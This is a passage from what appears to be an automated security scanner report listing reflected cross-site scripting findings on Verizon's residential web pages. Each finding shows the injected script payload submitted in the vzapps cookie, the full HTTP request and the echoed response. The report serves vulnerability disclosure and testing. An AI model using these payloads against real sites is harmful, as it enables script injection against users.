Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload e00e8<script>alert(1)</script>275bd796ccd was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe00e8<script>alert(1)</script>275bd796ccd; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 61763
Expires: Sat, 20 Nov 2010 00:15:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=TXe00e8<script>alert(1)</script>275bd796ccd; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE00E8<SCRIPT>ALERT(1)</SCRIPT>275BD796CCD </DIV>
...[SNIP]...

3.141. http://www22.verizon.com/Residential/DirecTV/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50cb2'><script>alert(1)</script>84521e8362 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX50cb2'><script>alert(1)</script>84521e8362; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63787
Expires: Sat, 20 Nov 2010 00:11:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX50cb2'><script>alert(1)</script>84521e8362; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Overview
</title><meta name="keywords" content="direct tv, directv, hd tv, hd, hd channels, tv, dvr, direct tv, satellite, satel
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX50CB2'><SCRIPT>ALERT(1)</SCRIPT>84521E8362 ' />
...[SNIP]...

3.142. http://www22.verizon.com/Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e7f4a'><script>alert(1)</script>12ba1c0fab5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe7f4a'><script>alert(1)</script>12ba1c0fab5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 179664
Expires: Sat, 20 Nov 2010 00:12:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe7f4a'><script>alert(1)</script>12ba1c0fab5; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Channels
</title><meta name="keywords" content="direct tv channels, hd tv channels, hd channels, tv channels, dvr channels, dire
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE7F4A'><SCRIPT>ALERT(1)</SCRIPT>12BA1C0FAB5 ' />
...[SNIP]...

3.143. http://www22.verizon.com/Residential/DirecTV/Equipment/Equipment.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4eb83'><script>alert(1)</script>d3ff6108a2c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4eb83'><script>alert(1)</script>d3ff6108a2c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71665
Expires: Sat, 20 Nov 2010 00:11:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4eb83'><script>alert(1)</script>d3ff6108a2c; path=/
Set-Cookie: ContextInfo_Equipment=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Receivers | HD DVR
</title><meta name="keywords" content="receiver, high definition receiver, hd reciever, dvr receiver, sd rece
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4EB83'><SCRIPT>ALERT(1)</SCRIPT>D3FF6108A2C ' />
...[SNIP]...

3.144. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9a607'><script>alert(1)</script>d0ccb927d19 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX9a607'><script>alert(1)</script>d0ccb927d19; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 50560
Expires: Sat, 20 Nov 2010 00:09:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9a607'><script>alert(1)</script>d0ccb927d19; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Installation
</title><meta name="keywords" content="directv installation, satellite installation, install satellite, install tv,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX9A607'><SCRIPT>ALERT(1)</SCRIPT>D0CCB927D19 ' />
...[SNIP]...

3.145. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 7ac79<script>alert(1)</script>c047a0243fc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX7ac79<script>alert(1)</script>c047a0243fc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 50556
Expires: Sat, 20 Nov 2010 00:09:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX7ac79<script>alert(1)</script>c047a0243fc; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Installation
</title><meta name="keywords" content="directv installation, satellite installation, install satellite, install tv,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX7AC79<SCRIPT>ALERT(1)</SCRIPT>C047A0243FC </DIV>
...[SNIP]...

3.146. http://www22.verizon.com/Residential/DirecTV/Packages/Packages.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/Packages/Packages.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 474e8'><script>alert(1)</script>6198f299341 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Packages/Packages.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX474e8'><script>alert(1)</script>6198f299341; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65391
Expires: Sat, 20 Nov 2010 00:12:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX474e8'><script>alert(1)</script>6198f299341; path=/
Set-Cookie: ContextInfo_Language=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Packages | English
</title><meta name="keywords" content="spanish package, directv bundle package, bundle package, satellite bun
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX474E8'><SCRIPT>ALERT(1)</SCRIPT>6198F299341 ' />
...[SNIP]...

3.147. http://www22.verizon.com/Residential/DirecTV/Premium/Premium.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/Premium/Premium.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64704'><script>alert(1)</script>60e1cc3bb19 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Premium/Premium.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX64704'><script>alert(1)</script>60e1cc3bb19; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 84381
Expires: Sat, 20 Nov 2010 00:10:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX64704'><script>alert(1)</script>60e1cc3bb19; path=/
Set-Cookie: ContextInfo_DTVPremium=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Premiums
</title><meta name="keywords" content="channels, premium programming, sports packages, movie packages, premium packages
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX64704'><SCRIPT>ALERT(1)</SCRIPT>60E1CC3BB19 ' />
...[SNIP]...

3.148. http://www22.verizon.com/Residential/EntertainmentOnDemand/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/EntertainmentOnDemand/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ecc81'><script>alert(1)</script>633e3a55ed6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXecc81'><script>alert(1)</script>633e3a55ed6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 50751
Expires: Sat, 20 Nov 2010 00:16:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:06 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXecc81'><script>alert(1)</script>633e3a55ed6; path=/
Set-Cookie: FLOWTYPE=VASIP; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Entertainment on Demand
</title><meta name="keywords" content="verizon entertainment on demand, verizon eod, verizon games, verizon movies
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXECC81'><SCRIPT>ALERT(1)</SCRIPT>633E3A55ED6 ' />
...[SNIP]...

3.149. http://www22.verizon.com/Residential/EntertainmentOnDemand/Games/Games.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/EntertainmentOnDemand/Games/Games.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 676cd'><script>alert(1)</script>a3a252376e7 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/Games/Games.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX676cd'><script>alert(1)</script>a3a252376e7; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75296
Expires: Sat, 20 Nov 2010 00:16:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX676cd'><script>alert(1)</script>a3a252376e7; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Entertainment on Demand: Games
</title><meta name="keywords" content="games, world of warcraft, internet games, online games, action game
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX676CD'><SCRIPT>ALERT(1)</SCRIPT>A3A252376E7 ' />
...[SNIP]...

3.150. http://www22.verizon.com/Residential/EntertainmentOnDemand/Movies/Movies.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/EntertainmentOnDemand/Movies/Movies.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 46bbc'><script>alert(1)</script>e3e3a635f7b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/Movies/Movies.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX46bbc'><script>alert(1)</script>e3e3a635f7b; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70797
Expires: Sat, 20 Nov 2010 00:16:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX46bbc'><script>alert(1)</script>e3e3a635f7b; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Entertainment on Demand: Movies
</title><meta name="keywords" content="video downloads, movie downloads, internet movie, internet televisi
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX46BBC'><SCRIPT>ALERT(1)</SCRIPT>E3E3A635F7B ' />
...[SNIP]...

3.151. http://www22.verizon.com/Residential/FiOSInternet/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 56c4c'><script>alert(1)</script>277bd852140 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX56c4c'><script>alert(1)</script>277bd852140; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119110
Expires: Sat, 20 Nov 2010 00:11:18 GMT
